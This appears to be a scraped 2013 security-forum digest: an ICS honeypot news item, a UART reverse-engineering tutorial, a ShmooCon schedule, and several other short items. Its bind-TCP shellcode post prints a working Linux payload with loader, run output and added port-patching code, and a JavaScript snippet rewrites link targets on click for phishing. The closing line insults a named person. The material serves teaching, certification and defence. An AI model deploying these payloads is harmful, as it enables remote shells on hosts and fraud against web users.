At Black Hat Europe 2013 in Amsterdam, a security researcher at Trend Micro revealed a collaborative honeypot project with the SCADA security team that ran fake ICS/SCADA devices of the kind used in many critical-infrastructure power and water plants. The honeypots were optimized and promoted on search engines such as Google so that they could be found directly, tricking attackers into believing the servers were real. The servers were named Scada-1, Scada-2, and so on. According to SCADA security researcher Kyle Wilhoit, they also seeded the honeypot on devices that were part of HD Moore's Shodan Project, so that motivated and targeted attackers could find the servers easily; the first attack was detected after only 18 hours.

You can get the Trend Micro report by following this link: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-whos-really-attacking-your-ics-equipment.pdf

Source: Trend Micro Warns of Attacks Against ICS/SCADA Systems | SecTechno
-
[h=1]Reverse Engineering Serial Ports[/h] By Craig | November 1, 2012 | Embedded Systems, Hardware, Tutorials

Given the name of this blog and the number of requests that I've had, I think it's high time we discussed serial ports; specifically, serial ports in embedded systems. My goal here is to describe the techniques that I've found effective in identifying and reverse engineering embedded serial ports through the use of definitive testing and educated guesses, and without the need for expensive equipment.

[h=1]Introduction[/h]

Serial ports are extremely useful to embedded developers, who commonly use them for:
- Accessing the boot loader
- Observing boot and debug messages
- Interacting with the system via a shell

Needless to say, this functionality is also useful to hackers, so finding a serial port on an embedded device can be very advantageous. As a case study, we'll be examining the PCB of a Westell 9100EM FiOS router for possible serial ports:

Westell 9100EM PCB

Now, these aren't your dad's RS-232 serial ports that we're looking for; these are Universal Asynchronous Receiver Transmitters (UARTs), commonly found in embedded devices. Although protocol compatible, RS-232 and UART are not voltage compatible (from here on out I will use the terms "UART" and "serial port" interchangeably). UARTs most commonly operate at 3.3 volts, but can also be found operating at other standard voltages (5, 1.8, etc).

Unfortunately there aren't any industry standardized UART pin outs, and manufacturers don't often go around advertising or documenting their debug interfaces, so we'll need to do a bit of work in order to interface with these serial ports. Specifically, we need to reverse engineer both the hardware interface and the software protocol settings. Let's start with the hardware interface first. For this, you'll need a multimeter and a pair of eyeballs (or even one will do just fine). Yes, oscilloscopes and logic analyzers are useful and sometimes necessary, but 99% of the time a trusty multimeter and a bit of knowledge is all you need.

[h=1]Identifying Serial Headers[/h]

The first step is to try to identify potential candidates for serial port headers. Most serial port headers have at a minimum four pins:
- Vcc
- Ground
- Transmit
- Receive

Typically you'll want to look for a single row of 4-6 pins, although this is not a hard and fast rule and they can come in any pin configuration the manufacturer has decided on. On our 9100EM PCB we find two possible candidates, labeled P1402 and P1404:

Possible serial port headers

Sometimes you won't have a nicely broken out set of pins like this, and you'll have to examine test points on the board; usually starting with test points closest to the SoC is a good idea. Here is an example of a serial port exposed via test points on a different board, the WL530G:

Serial port test points on a WL530G

In either case the process of pin identification is the same, but usually takes longer if there is no header since there will likely be more than 4 test points on the board that you will need to examine. At this point either P1402 or P1404 could be serial port headers. Or they could both be serial port headers. Or neither could be a serial port header. So we'll examine the pins on each header individually to try to gain some insight.

Full article: http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/
-
[h=1]Shell bind TCP shellcode[/h]

Hello everybody,

Last week I finished the SecurityTube Linux Assembly Expert (SLAE) course, which requires completing 7 assignments in order to get certified. Thus, I would like to publish the shell_bind_TCP shellcode I have written in Intel IA-32 assembly. The shellcode run test and the analysis are included in this post.

[h=3]Source code[/h]

I wrote two versions of the shell_bind_tcp shellcode. First, a very detailed one, shellcode size 141 bytes, which you can get here: shell_bind_tcp.nasm. The second one is just an extra attempt to reduce the shellcode size down to 108 bytes, here: shell_bind_tcp_smaller.nasm

[h=3]Generating shellcode[/h]

$ ./compile_all.sh shell_bind_tcp 43775
[I] Using custom port: 43775
[+] Assembling shell_bind_tcp.nasm with NASM ...
[+] Linking shell_bind_tcp.o ...
[+] Generating shellcode with objdump ...
[+] Checking shellcode for NULLs ...
[+] Shellcode size is 141 bytes
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff"
[+] Generating shellcode.c file with the shell_bind_tcp shellcode ...
[+] Compiling shellcode.c with GCC ...
[+] All done!
You can run the shellcode now: $ ./shellcode

[h=3]Checking generated shellcode.c[/h]

arno $ cat shellcode.c
#include <stdio.h>
#include <string.h>

// The shell_bind_TCP shellcode itself (108-byte version)
unsigned char code[] = \
"\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff";

int main(void)
{
    // strlen() stops at the first NUL byte, which is why the build script checks for NULLs
    printf("Shellcode Length: %d\n", (int)strlen(code));
    // Cast the byte array to a function pointer and jump into it
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}

[h=3]Compiling and executing a shellcode[/h]

arno $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
arno $ ./shellcode
Shellcode Length: 108

root # netstat --inet -apn |grep -i shellcode
tcp 0 0 0.0.0.0:43775 0.0.0.0:* LISTEN 11137/./shellcode

It appears that our shellcode has been executed and is listening on port 43775/tcp as expected.

[h=3]Connecting to a shell[/h]

root # nc localhost 43775
id
uid=500(arno) gid=500(arno) groups=500(arno) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
date
Sat Mar 9 13:59:11 CET 2013
quit
//bin/sh: line 3: quit: command not found
exit

As you may have noticed, it is exactly our shell that was spawned (execve "//bin/sh") when we tried to run a command that doesn't exist on the server.

[h=3]Shellcode emulation and visualization[/h]

$ strace -e socket,bind,listen,accept,dup2,execve ./shellcode
execve("./shellcode", ["./shellcode"], [/* 57 vars */]) = 0
[ Process PID=18644 runs in 32 bit mode. ]
Shellcode Length: 141
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(43775), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1) = 0
accept(3, 0, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("//bin/sh", ["//bin/sh"], [/* 26 vars */]) = 0
[ Process PID=18644 runs in 64 bit mode. ]
socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 5
socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 5
--- SIGCHLD (Child exited) @ 0 (0) ---

For a better understanding, I suggest looking at the visualization together with the shellcode source, which is very detailed: shell_bind_tcp.nasm. libemu was used to visualize the shellcode.

Next assignment, the Shell_Reverse_TCP shellcode, is coming soon!

Source: Shell bind TCP shellcode | NIXAID.COM
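The build script above checks the generated bytes for NULLs and the strace output confirms the syscall sequence and the port, but both checks are worth having as plain code when you reuse a payload from a post like this. The following is an added example written for this page, not part of the original post or its repository: it takes the 108-byte shellcode printed above as a byte string, counts NUL bytes (a strlen()-based loader such as the shellcode.c above would silently truncate at the first one), counts `int 0x80` opcodes as a smoke test for the expected socket/bind/listen/accept/dup2/execve sequence, decodes the listening port from the trailing two bytes (the shellcode loads them through EDI with `pushw [edi]` when building the sockaddr_in), and re-points the payload at another port while refusing any port whose network-order encoding would reintroduce a 0x00 byte.

```c
/*
 * Static checks over raw shellcode before dropping it into a loader.
 * Added example for this page; the byte string is the 108-byte
 * shell_bind_tcp payload from the post, everything else is new.
 */
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* 108-byte shell_bind_tcp shellcode. The last two bytes, AA FF, are the
 * bind() port in network byte order: 0xAAFF = 43775. */
static const unsigned char bind_shell_108[] =
    "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a"
    "\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb"
    "\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66"
    "\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01"
    "\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52"
    "\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0"
    "\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68"
    "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
    "\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
    "\x80\xe8\xab\xff\xff\xff\xaa\xff";
#define BIND_SHELL_108_LEN (sizeof(bind_shell_108) - 1)   /* drop the literal's NUL */

/* Number of 0x00 bytes. A strlen()-based loader stops at the first one. */
size_t count_nulls(const unsigned char *sc, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0x00) n++;
    return n;
}

/* Number of `int 0x80` opcodes (CD 80). Cheap check that the syscall
 * sequence survived copy-paste; CD 80 appearing as data would also match,
 * so treat this as a smoke test, not a disassembly. */
size_t count_int80(const unsigned char *sc, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len; i++)
        if (sc[i] == 0xcd && sc[i + 1] == 0x80) n++;
    return n;
}

/* Decode the trailing 16-bit port (network byte order); -1 if too short. */
int trailing_port(const unsigned char *sc, size_t len)
{
    if (len < 2) return -1;
    return (sc[len - 2] << 8) | sc[len - 1];
}

/* Re-point the payload at another port. Refuses any port whose big-endian
 * encoding contains 0x00 (every port below 256, and any multiple of 256),
 * since that would reintroduce a NUL byte. Returns 0 on success, -1 otherwise. */
int patch_trailing_port(unsigned char *sc, size_t len, uint16_t port)
{
    unsigned char hi = (unsigned char)(port >> 8);
    unsigned char lo = (unsigned char)(port & 0xff);
    if (len < 2 || hi == 0x00 || lo == 0x00) return -1;
    sc[len - 2] = hi;
    sc[len - 1] = lo;
    return 0;
}

/* Copy the shellcode, patch the port and read it back: the port actually
 * encoded, or -1 if the patch was refused. */
int patched_port_roundtrip(uint16_t port)
{
    unsigned char buf[sizeof(bind_shell_108)];
    memcpy(buf, bind_shell_108, sizeof(buf));
    if (patch_trailing_port(buf, BIND_SHELL_108_LEN, port) != 0) return -1;
    return trailing_port(buf, BIND_SHELL_108_LEN);
}

int main(void)
{
    printf("length       : %zu bytes\n", BIND_SHELL_108_LEN);
    printf("NUL bytes    : %zu\n", count_nulls(bind_shell_108, BIND_SHELL_108_LEN));
    printf("int 0x80     : %zu\n", count_int80(bind_shell_108, BIND_SHELL_108_LEN));
    printf("bind port    : %d\n", trailing_port(bind_shell_108, BIND_SHELL_108_LEN));
    printf("repoint 4444 : %d\n", patched_port_roundtrip(4444));
    printf("repoint 256  : %d (refused: 01 00 contains a NUL)\n", patched_port_roundtrip(256));
    return 0;
}
```

The same trailing-port convention holds for the 141-byte version (it also ends in `\xaa\xff` and pops the address into EDI after the call), but that one issues eight `int 0x80` instructions because it performs the three dup2() calls separately instead of in a loop.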
-
Failures of secret-key cryptography
D. J. Bernstein, University of Illinois at Chicago & Technische Universiteit Eindhoven

2011 Grigg-Gutmann: "In the past 15 years no one ever lost money to an attack on a properly designed cryptosystem (meaning one that didn't use homebrew crypto or toy keys) in the Internet or commercial worlds".

Download: http://cr.yp.to/talks/2013.03.12/slides.pdf
-
[h=1]Hacking the <a> tag in 100 characters[/h] 17 March 2013

A short while ago, I discovered that JavaScript allows you to change the <a> href after you click on it. It may not seem that serious at first glance, but rest assured, it can trick customers into giving their details to fraudsters. Let me show you an example. This link should take you to PayPal. You'll see that you do not end up on PayPal (except on Opera, where it appears to have been fixed). That's because when you clicked on the link, I ran some code that changed the href attribute and, surprisingly, the browser sent me to the new link. That shouldn't happen. Website visitors (and perhaps most tech-savvy people) can and will presume that where they end up could just be a genuine redirection from, in this case, PayPal. Last year, PayPal redirected their UK homepage to paypal-business.co.uk for months. My assumption is that website visitors have grown accustomed to redirections, and if this flaw acts as one, it can pose a real threat, in what I call Phishing 2.0.

Let's take a look at the JavaScript:

// Uncompressed
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
    links[i].onclick = function () {
        this.href = 'http://bit.ly/141nisR'; // Insert link here
    };
}

// Compressed (100 characters exc. the link)
o=document.getElementsByTagName('a');for(j=0;j<o.length;j++){o[j].onclick=function(){this.href='http://bit.ly/141nisR';}}

It's also very difficult to detect. Almost everyone who uses JavaScript/jQuery will bind an event to an <a> tag, so it's not as simple as unbinding every <a> onclick function. It's very much possible to wrap the code above in a setTimeout to bypass whatever solution can be found. Any half-decent hacker can make a computer virus or embeddable JavaScript code that can inject this code alongside another piece of software. As it's incredibly easy to update JavaScript (particularly embeddable), I would say that tools such as McAfeeSecure and PhishTank won't be able to keep up with phishing websites up to the second.

As it shows no real benefit, I'm pledging to the World Wide Web Consortium (W3C) and major browsers to disable the option to change the href attribute after an onclick event. It is an incredibly simple interpreter flaw, and whilst it may seem normal to some, it can be used for ill-fated purposes rather than good. I'm aware Google and websites like it use this, but if we're supposed to be making the web safer, we can't allow such simple flaws to exist. There are alternatives (such as using the genuine link rather than masking it), and for that reason, it should be disabled. It's not worth internet users being victims of fraud and theft.

Source: Hacking the <a> tag in 100 characters
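The post asks browser vendors to stop honouring an href changed inside the click handler. Until they do, a page (or a browser extension) can catch the swap itself, because the navigation only starts after every click listener has run. The following is an added example written for this page, not code from the original post: it snapshots each link's href when the pointer goes down on it (capturing phase, so before any page handler runs), compares it with the href at click time in a bubbling-phase listener on the document (so after the link's own onclick has executed), and cancels the navigation when the origin has changed. `hrefSwapped()` is plain JavaScript and runs anywhere; `installLinkGuard()` assumes a browser DOM. The default base URL and the sample URLs are assumptions for the demo. One caveat the post's own attack could exploit: a malicious onclick that calls `stopPropagation()` prevents the document-level click listener from seeing the event at all, which is why the author's browser-level fix is the right one.

```javascript
// Added example for this page: detect a link whose href was changed
// between pointerdown and click, and block the resulting navigation.

// True when the two hrefs resolve to different origins. Relative hrefs
// are resolved against `base` (assumed: the page URL). Anything that fails
// to parse as a URL is treated as a swap, since a real link was parseable.
function hrefSwapped(armedHref, clickHref, base = 'https://example.test/') {
  let armed, clicked;
  try {
    armed = new URL(armedHref, base);
    clicked = new URL(clickHref, base);
  } catch (e) {
    return true;
  }
  // javascript: and data: URLs have an opaque origin ("null"), so they
  // compare unequal to any http(s) origin and are blocked as well.
  return armed.origin !== clicked.origin;
}

// Wire the guard onto `root` (normally `document`). `onBlock(shown, actual)`
// is called with the href the user saw and the href the page tried to send
// them to. Assumes a browser DOM; not exercised outside one.
function installLinkGuard(root, onBlock) {
  const armed = new WeakMap(); // link element -> href seen at pointerdown

  const linkFor = (target) =>
    target && typeof target.closest === 'function' ? target.closest('a[href]') : null;

  // Capturing phase: runs before any handler the page attached to the <a>.
  root.addEventListener('pointerdown', (ev) => {
    const link = linkFor(ev.target);
    if (link) armed.set(link, link.href);
  }, true);

  // Bubbling phase on the root: runs after the <a>'s own onclick, so a
  // swap made there is visible, and preventDefault() still stops navigation.
  root.addEventListener('click', (ev) => {
    const link = linkFor(ev.target);
    if (!link || !armed.has(link)) return;
    const shown = armed.get(link);
    if (hrefSwapped(shown, link.href, root.baseURI)) {
      ev.preventDefault();
      onBlock(shown, link.href);
    }
  }, false);
}

// Demo wiring, only when a DOM is present.
if (typeof document !== 'undefined') {
  installLinkGuard(document, (shown, actual) => {
    console.warn('blocked navigation: link showed', shown, 'but tried to open', actual);
  });
}
```

Drop the block into a page that also contains the 100-character snippet above and click any link: the onclick still rewrites `href`, but the navigation is cancelled and the original and substituted URLs are logged. Same-origin changes (a different path on the same host) are allowed on purpose, since legitimate sites do rewrite hrefs for click tracking.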
-
[h=2]Developer releases source code of Linux speech recognition program[/h] Posted by Swapnil Bhartiya, 17 Mar 2013

Independent developer James McClain has developed a program which uses the Google Voice API on the back end to carry out various tasks on a GNU/Linux machine, the way Siri does on iDevices. The program allows a user to open sites, ask questions and perform other tasks by voice alone. While initially developed for Ubuntu, it is distro-agnostic and can be used on other distributions as well. The developer was running a private beta to further improve the project and has now released the source code under the GNU GPL v3 licence. Watch the video below to see what this program is capable of doing. You can grab the source code from GitHub.

Source: Developer releases source code of Linux speech recognition program | Muktware
-
ShmooCon 2013

Friday, February 15, 2013
1200 Registration Opens
1430 Opening Remarks and Rants (Bruce Potter)
1530 How to Own a Building: Exploiting the Physical World with BacNET and the BacNET Attack Framework (Brad Bowers)
1600 Mainframed: The Secrets Inside that Black Box (Phil Young)
1630 WIPE THE DRIVE!!! - Techniques for Malware Persistence (Mark Baggett and Jake Williams)
1700 Apple iOS Certificate Tomfoolery (Tim Medin)
1730 Hide and Seek, Post-Exploitation Style (TJ O'Connor and Tim Tomes)
1800 Bringing The Sexy Back To...Defense In Depth (Martin Fisher)
1830 Hackers get Schooled: Learning Lessons from Academia (Bruce Potter, moderator; Matt Blaze, Chris Eagle, Invisigoth, Dave Marcus and Michael Schearer)
2000 (title not listed)

Saturday, February 16, 2013 (tracks: Build It! / Belay It! / Bring it On!)
0930 Registration Opens
1000
  Build It!: Running a CTF: Panel and Discussion on the Art of Hacker Gaming (Branson Matheson, Brett Thorson, Liam Randall, Jordan Wiens, Tyler Nighswander)
  Belay It!: C10M: Defending the Internet at Scale (Robert Graham)
  Bring it On!: Paparazzi over IP (Daniel Mende and Pascal Turbing)
1100
  Build It!: DIY: Using Trust to Secure Embedded Projects (Teddy Reed and David Anthony)
  Belay It!: Moloch: A New and Free Way To Index Your Packet Capture Repository (Andy Wick and Eoin Miller)
  Bring it On!: OpenStack Security Brief (Matthew Joyce)
1200
  Build It!: Generalized Single Packet Authorization for Cloud Computing Environments (Michael Rash)
  Belay It!: From "Shotgun Parsers" to Better Software Stacks (Meredith Patterson, Sergey Bratus and Dan TQ Hirsh)
  Bring it On!: The Computer Fraud and Abuse Act: Swartz, Auernheimer, and Beyond (Orin Kerr and Marcia Hoffman)
1300 Lunch
1400
  Build It!: Malware Analysis: Collaboration, Automation & Training (Richard Harman)
  Belay It!: Bright Shiny Things: Why We Need Intelligent Data Access Controls (Bob Bigman, Craig Rosen, David Ferraiolo, Mark McGovern)
  Bring it On!: Ten Strategies of a World-Class Computer Security Incident Response Team (Carson Zimmerman)
1500
  Build It!: Armor for your Android Apps (Roman Faynberg)
  Belay It!: Protecting Sensitive Information on iOS Devices (David Schuetz)
  Bring it On!: Beyond Nymwars: An Analysis of the Online Identity Battleground (Aestetix)
1600
  Build It!: How Smart Is Bluetooth Smart? (Mike Ryan)
  Belay It!: Chopshop: Busting the Gh0st (Wesley Shields and Murad Khan)
  Bring it On!: The Cloud - Storms on the Horizon (Tyler Pitchford)
1700
  Build It!: 0wn the Con (The Shmoo Group)
  Belay It!: PunkSPIDER: An Open Source, Scalable Distributed Fuzzing Project Targeting the Entire Internet (Alejandro Caceres)
  Bring it On!: Crypto: You're doing it wrong (Ron Bowes)
1830 Fire Talks
2000 Saturday Night Party @ TBD

Sunday, February 17, 2013 (tracks: Build It! / Belay It! / Bring it On!)
0930 Registration Opens
1000
  Build It!: Identity-Based Internet Protocol Network (David Pisano)
  Belay It!: NSM and more with Bro Network Monitor (Liam Randall)
  Bring it On!: These Go to Eleven: When the Law Goes Too Far (Michael Schearer)
1100
  Build It!: Forensics - ExFat Bastardized for Cameras (Scott Moulton)
  Belay It!: Page Fault Liberation Army or Better Security Through Trapping (Julian Bangert and Sergey Bratus)
  Bring it On!: Hacking as an Act of War (G. Mark Hardy)
1200
  Build It!: MASTIFF: Automated Static Analysis Framework (Tyler Hudak)
  Belay It!: Attacking SCADA Wireless Systems for Fun and Profit - and Fixing (Atlas)
  Bring it On!: Ka-ching! How to Make Real Money (Margaret Russell)
1300 Room Split Break
1330 Is Practical Information Sharing Possible? (Sean Barnum, Doug Wilson, Ben Miller)
1430 Closing Remarks

Source: ShmooCon 2013 - February 15-17 - ShmooCon 2013
-
Download Microsoft Mathematics 4.0 from Official Microsoft Download Center MATLAB - The Language of Technical Computing
-
Sunday, 18:00, on "Romania, te iubesc": cybercrime, a phenomenon more dangerous than terrorism for the future. Who the fuck is that loser with 9 years of schooling? Edit: It's Iceman (Robert Butyka), with no teeth and no grammar.